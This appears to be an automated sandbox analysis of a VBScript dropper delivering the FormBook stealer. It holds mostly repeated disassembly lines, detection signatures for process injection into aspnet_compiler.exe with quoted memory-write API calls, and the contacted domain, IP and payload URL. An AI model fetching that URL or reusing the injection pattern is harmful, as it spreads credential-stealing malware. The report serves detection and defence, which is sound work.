Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0E5E7 mov eax, dword ptr fs:[00000030h] 3_2_01A0E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0E5E7 mov eax, dword ptr fs:[00000030h] 3_2_01A0E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0E5E7 mov eax, dword ptr fs:[00000030h] 3_2_01A0E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0E5E7 mov eax, dword ptr fs:[00000030h] 3_2_01A0E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0E5E7 mov eax, dword ptr fs:[00000030h] 3_2_01A0E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1C5ED mov eax, dword ptr fs:[00000030h] 3_2_01A1C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1C5ED mov eax, dword ptr fs:[00000030h] 3_2_01A1C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E65D0 mov eax, dword ptr fs:[00000030h] 3_2_019E65D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A015F4 mov eax, dword ptr fs:[00000030h] 3_2_01A015F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A015F4 mov eax, dword ptr fs:[00000030h] 3_2_01A015F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A015F4 mov eax, dword ptr fs:[00000030h] 3_2_01A015F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A015F4 mov eax, dword ptr fs:[00000030h] 3_2_01A015F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A015F4 mov eax, dword ptr fs:[00000030h] 3_2_01A015F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A015F4 mov eax, dword ptr fs:[00000030h] 3_2_01A015F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A155C0 mov eax, dword ptr fs:[00000030h] 3_2_01A155C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB55C9 mov eax, dword ptr fs:[00000030h] 3_2_01AB55C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1E5CF mov eax, dword ptr fs:[00000030h] 3_2_01A1E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1E5CF mov eax, dword ptr fs:[00000030h] 3_2_01A1E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1A5D0 mov eax, dword ptr fs:[00000030h] 3_2_01A1A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1A5D0 mov eax, dword ptr fs:[00000030h] 3_2_01A1A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A5D5D0 mov eax, dword ptr fs:[00000030h] 3_2_01A5D5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A5D5D0 mov ecx, dword ptr fs:[00000030h] 3_2_01A5D5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A095DA mov eax, dword ptr fs:[00000030h] 3_2_01A095DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB35D7 mov eax, dword ptr fs:[00000030h] 3_2_01AB35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB35D7 mov eax, dword ptr fs:[00000030h] 3_2_01AB35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB35D7 mov eax, dword ptr fs:[00000030h] 3_2_01AB35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E25E0 mov eax, dword ptr fs:[00000030h] 3_2_019E25E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A9B52F mov eax, dword ptr fs:[00000030h] 3_2_01A9B52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A8F525 mov eax, dword ptr fs:[00000030h] 3_2_01A8F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A8F525 mov eax, dword ptr fs:[00000030h] 3_2_01A8F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A8F525 mov eax, dword ptr fs:[00000030h] 3_2_01A8F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A8F525 mov eax, dword ptr fs:[00000030h] 3_2_01A8F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A8F525 mov eax, dword ptr fs:[00000030h] 3_2_01A8F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A8F525 mov eax, dword ptr fs:[00000030h] 3_2_01A8F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A8F525 mov eax, dword ptr fs:[00000030h] 3_2_01A8F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1D530 mov eax, dword ptr fs:[00000030h] 3_2_01A1D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1D530 mov eax, dword ptr fs:[00000030h] 3_2_01A1D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB5537 mov eax, dword ptr fs:[00000030h] 3_2_01AB5537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0E53E mov eax, dword ptr fs:[00000030h] 3_2_01A0E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0E53E mov eax, dword ptr fs:[00000030h] 3_2_01A0E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0E53E mov eax, dword ptr fs:[00000030h] 3_2_01A0E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0E53E mov eax, dword ptr fs:[00000030h] 3_2_01A0E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0E53E mov eax, dword ptr fs:[00000030h] 3_2_01A0E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A17505 mov eax, dword ptr fs:[00000030h] 3_2_01A17505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A17505 mov ecx, dword ptr fs:[00000030h] 3_2_01A17505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F0535 mov eax, dword ptr fs:[00000030h] 3_2_019F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F0535 mov eax, dword ptr fs:[00000030h] 3_2_019F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F0535 mov eax, dword ptr fs:[00000030h] 3_2_019F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F0535 mov eax, dword ptr fs:[00000030h] 3_2_019F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F0535 mov eax, dword ptr fs:[00000030h] 3_2_019F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F0535 mov eax, dword ptr fs:[00000030h] 3_2_019F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019ED534 mov eax, dword ptr fs:[00000030h] 3_2_019ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019ED534 mov eax, dword ptr fs:[00000030h] 3_2_019ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019ED534 mov eax, dword ptr fs:[00000030h] 3_2_019ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019ED534 mov eax, dword ptr fs:[00000030h] 3_2_019ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019ED534 mov eax, dword ptr fs:[00000030h] 3_2_019ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019ED534 mov eax, dword ptr fs:[00000030h] 3_2_019ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB4500 mov eax, dword ptr fs:[00000030h] 3_2_01AB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB4500 mov eax, dword ptr fs:[00000030h] 3_2_01AB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB4500 mov eax, dword ptr fs:[00000030h] 3_2_01AB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB4500 mov eax, dword ptr fs:[00000030h] 3_2_01AB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB4500 mov eax, dword ptr fs:[00000030h] 3_2_01AB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB4500 mov eax, dword ptr fs:[00000030h] 3_2_01AB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB4500 mov eax, dword ptr fs:[00000030h] 3_2_01AB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1656A mov eax, dword ptr fs:[00000030h] 3_2_01A1656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1656A mov eax, dword ptr fs:[00000030h] 3_2_01A1656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1656A mov eax, dword ptr fs:[00000030h] 3_2_01A1656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E8550 mov eax, dword ptr fs:[00000030h] 3_2_019E8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E8550 mov eax, dword ptr fs:[00000030h] 3_2_019E8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1B570 mov eax, dword ptr fs:[00000030h] 3_2_01A1B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1B570 mov eax, dword ptr fs:[00000030h] 3_2_01A1B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019DB562 mov eax, dword ptr fs:[00000030h] 3_2_019DB562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A134B0 mov eax, dword ptr fs:[00000030h] 3_2_01A134B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A144B0 mov ecx, dword ptr fs:[00000030h] 3_2_01A144B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A6A4B0 mov eax, dword ptr fs:[00000030h] 3_2_01A6A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E9486 mov eax, dword ptr fs:[00000030h] 3_2_019E9486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E9486 mov eax, dword ptr fs:[00000030h] 3_2_019E9486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019DB480 mov eax, dword ptr fs:[00000030h] 3_2_019DB480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E64AB mov eax, dword ptr fs:[00000030h] 3_2_019E64AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A894E0 mov eax, dword ptr fs:[00000030h] 3_2_01A894E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB54DB mov eax, dword ptr fs:[00000030h] 3_2_01AB54DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E04E5 mov ecx, dword ptr fs:[00000030h] 3_2_019E04E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1A430 mov eax, dword ptr fs:[00000030h] 3_2_01A1A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A18402 mov eax, dword ptr fs:[00000030h] 3_2_01A18402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A18402 mov eax, dword ptr fs:[00000030h] 3_2_01A18402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A18402 mov eax, dword ptr fs:[00000030h] 3_2_01A18402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0340D mov eax, dword ptr fs:[00000030h] 3_2_01A0340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019DC427 mov eax, dword ptr fs:[00000030h] 3_2_019DC427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019DE420 mov eax, dword ptr fs:[00000030h] 3_2_019DE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019DE420 mov eax, dword ptr fs:[00000030h] 3_2_019DE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019DE420 mov eax, dword ptr fs:[00000030h] 3_2_019DE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019D645D mov eax, dword ptr fs:[00000030h] 3_2_019D645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0A470 mov eax, dword ptr fs:[00000030h] 3_2_01A0A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0A470 mov eax, dword ptr fs:[00000030h] 3_2_01A0A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0A470 mov eax, dword ptr fs:[00000030h] 3_2_01A0A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB547F mov eax, dword ptr fs:[00000030h] 3_2_01AB547F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019EB440 mov eax, dword ptr fs:[00000030h] 3_2_019EB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019EB440 mov eax, dword ptr fs:[00000030h] 3_2_019EB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019EB440 mov eax, dword ptr fs:[00000030h] 3_2_019EB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019EB440 mov eax, dword ptr fs:[00000030h] 3_2_019EB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019EB440 mov eax, dword ptr fs:[00000030h] 3_2_019EB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019EB440 mov eax, dword ptr fs:[00000030h] 3_2_019EB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h] 3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h] 3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h] 3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h] 3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h] 3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h] 3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h] 3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h] 3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A9F453 mov eax, dword ptr fs:[00000030h] 3_2_01A9F453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0245A mov eax, dword ptr fs:[00000030h] 3_2_01A0245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E1460 mov eax, dword ptr fs:[00000030h] 3_2_019E1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E1460 mov eax, dword ptr fs:[00000030h] 3_2_019E1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E1460 mov eax, dword ptr fs:[00000030h] 3_2_019E1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E1460 mov eax, dword ptr fs:[00000030h] 3_2_019E1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E1460 mov eax, dword ptr fs:[00000030h] 3_2_019E1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019FF460 mov eax, dword ptr fs:[00000030h] 3_2_019FF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019FF460 mov eax, dword ptr fs:[00000030h] 3_2_019FF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019FF460 mov eax, dword ptr fs:[00000030h] 3_2_019FF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019FF460 mov eax, dword ptr fs:[00000030h] 3_2_019FF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019FF460 mov eax, dword ptr fs:[00000030h] 3_2_019FF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019FF460 mov eax, dword ptr fs:[00000030h] 3_2_019FF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A6F7AF mov eax, dword ptr fs:[00000030h] 3_2_01A6F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A6F7AF mov eax, dword ptr fs:[00000030h] 3_2_01A6F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A6F7AF mov eax, dword ptr fs:[00000030h] 3_2_01A6F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A6F7AF mov eax, dword ptr fs:[00000030h] 3_2_01A6F7AF
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: temp_executable.exe.1.dr Jump to dropped file
.NET source code references suspicious native API functions
Source: temp_executable.exe.1.dr, Program.cs Reference to suspicious API methods: App.ReadProcessMemory(Settings.pi.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: temp_executable.exe.1.dr, Program.cs Reference to suspicious API methods: App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)
Source: temp_executable.exe.1.dr, Program.cs Reference to suspicious API methods: App.WriteProcessMemory(Settings.pi.ProcessHandle, num4, payload, bufferSize, ref bytesRead)
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 102E008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Queries volume information: C:\Users\user\AppData\Local\Temp\temp_executable.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524799 Sample: justificante de transferencia.vbs Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 20 transfer.adttemp.com.br 2->20 24 Malicious sample detected (through community Yara rule) 2->24 26 Yara detected FormBook 2->26 28 .NET source code contains method to dynamically call methods (often used by packers) 2->28 30 4 other signatures 2->30 8 wscript.exe 2 2->8         started        signatures3 process4 file5 18 C:\Users\user\AppData\...\temp_executable.exe, PE32 8->18 dropped 32 Benign windows process drops PE files 8->32 34 VBScript performs obfuscated calls to suspicious functions 8->34 36 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->36 12 temp_executable.exe 15 2 8->12         started        signatures6 process7 dnsIp8 22 transfer.adttemp.com.br 104.196.109.209, 443, 49710 GOOGLEUS United States 12->22 38 Antivirus detection for dropped file 12->38 40 Machine Learning detection for dropped file 12->40 42 Writes to foreign memory regions 12->42 44 2 other signatures 12->44 16 aspnet_compiler.exe 12->16         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.196.109.209
 transfer.adttemp.com.br United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
transfer.adttemp.com.br 104.196.109.209 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://transfer.adttemp.com.br/2alBy/sirdeeeeee.txt false
    		unknown